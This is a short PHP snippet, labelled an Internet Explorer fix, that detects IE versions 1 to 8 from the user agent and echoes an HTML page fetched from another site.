• Internet Explorer fix

    <?php
    if(preg_match('/(?i)msie [1-8]/',$_SERVER['HTTP_USER_AGENT'])){ echo file_get_contents('http://www.kautkas.com/file.html'); }
    ?>


1111111